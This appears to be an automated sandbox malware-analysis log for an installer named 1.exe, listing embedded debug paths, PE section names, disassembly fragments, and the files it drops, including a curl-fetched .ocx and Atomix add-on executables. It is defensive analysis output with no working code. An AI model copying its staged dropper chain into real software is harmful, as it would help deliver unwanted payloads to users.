    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5B7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995879000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455666591.0000024A2B101000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C7C0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2460054054.0000024A2D721000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D556000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000009.00000000.2403069778.00007FF7A2BF8000.00000002.00000001.01000000.0000000A.sdmp, SoftwareDistributor.exe
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D227000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459614069.0000024A2D6B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487954749.0000021DEA251000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000009.00000002.2455788652.0000024A2B160000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455841322.0000024A2B181000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483109037.0000021DE7F90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000009.00000002.2454007339.0000020995861000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F08000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957F2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000009.00000002.2458900009.0000024A2D594000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458980017.0000024A2D5A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000009.00000002.2453468583.0000020993E61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453402629.0000020993E53000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487355105.0000021DEA179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: shi6FC2.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
    Source: C:\Users\user\Desktop\1.exeCode function: 0_2_008CCF30 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,LoadLibraryW,GetProcAddress,GetEnvironmentVariableW,SHGetPathFromIDListW,SHGetMalloc,0_2_008CCF30
    Source: 1.exeStatic PE information: section name: .didat
    Source: 1.exeStatic PE information: section name: .fptable
    Source: ShortcutFlags.dll.0.drStatic PE information: section name: .fptable
    Source: MainSoftware.exe.0.drStatic PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.0.drStatic PE information: section name: .didat
    Source: MainSoftware.exe.0.drStatic PE information: section name: Section
    Source: MainSoftware.exe.0.drStatic PE information: section name: _RDATA
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: .didat
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: Section
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: _RDATA
    Source: MSI723B.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI727B.tmp.0.drStatic PE information: section name: .fptable
    Source: shi6FC2.tmp.0.drStatic PE information: section name: .wpp_sf
    Source: shi6FC2.tmp.0.drStatic PE information: section name: .didat
    Source: MSI7050.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI70ED.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI713C.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI716C.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI719C.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI71CC.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI71FC.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI7412.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI7442.tmp.0.drStatic PE information: section name: .fptable
    Source: MSI7472.tmp.0.drStatic PE information: section name: .fptable
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: .didat
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: Section
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: _RDATA
    Source: MainSoftware.exe.1.drStatic PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.1.drStatic PE information: section name: .didat
    Source: MainSoftware.exe.1.drStatic PE information: section name: Section
    Source: MainSoftware.exe.1.drStatic PE information: section name: _RDATA
    Source: MSIBB04.tmp.1.drStatic PE information: section name: .fptable
    Source: MSIBBC0.tmp.1.drStatic PE information: section name: .fptable
    Source: MSIBC2F.tmp.1.drStatic PE information: section name: .fptable
    Source: MSIBC8D.tmp.1.drStatic PE information: section name: .didat
    Source: MSIBC8D.tmp.1.drStatic PE information: section name: .fptable
    Source: MSID78A.tmp.1.drStatic PE information: section name: .fptable
    Source: MSID7F8.tmp.1.drStatic PE information: section name: .fptable
    Source: MSID857.tmp.1.drStatic PE information: section name: .fptable
    Source: MSIE45E.tmp.1.drStatic PE information: section name: .fptable
    Source: shiB789.tmp.4.drStatic PE information: section name: .wpp_sf
    Source: shiB789.tmp.4.drStatic PE information: section name: .didat
    Source: Install.exe.part.8.drStatic PE information: section name: .CLR_UEF
    Source: Install.exe.part.8.drStatic PE information: section name: .didat
    Source: Install.exe.part.8.drStatic PE information: section name: Section
    Source: Install.exe.part.8.drStatic PE information: section name: _RDATA
    Source: Install.exe.14.drStatic PE information: section name: .managed
    Source: Install.exe.14.drStatic PE information: section name: hydrated
    Source: 289930.ocx.19.drStatic PE information: section name: .fptable
    Source: Surfclub.exe.25.drStatic PE information: section name: .CLR_UEF
    Source: Surfclub.exe.25.drStatic PE information: section name: .didat
    Source: Surfclub.exe.25.drStatic PE information: section name: Section
    Source: Surfclub.exe.25.drStatic PE information: section name: _RDATA
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_056562E5 push es; ret 0_3_056562E8
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_055C2309 push esi; ret 0_3_055C230A
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_055C4A0A pushad ; iretd 0_3_055C4A35
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656235 push es; ret 0_3_05656238
    Source: C:\Users\user\Desktop\1.exeCode function: 0_3_05656239 push es; iretd 0_3_05656254
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBC2F.tmpJump to dropped file
    Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\289930.ocxJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI719C.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID78A.tmpJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe (copy)Jump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\shi6FC2.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI70ED.tmpJump to dropped file
    Source: C:\Program Files (x86)\Main\MainSoftware.exeFile created: C:\Program Files (x86)\Main\Chop\Install.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7472.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI7442.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_5480\ShortcutFlags.dllJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI716C.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI713C.tmpJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exeJump to dropped file
    Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\AppData\Local\Temp\MSI71CC.tmpJump to dropped file
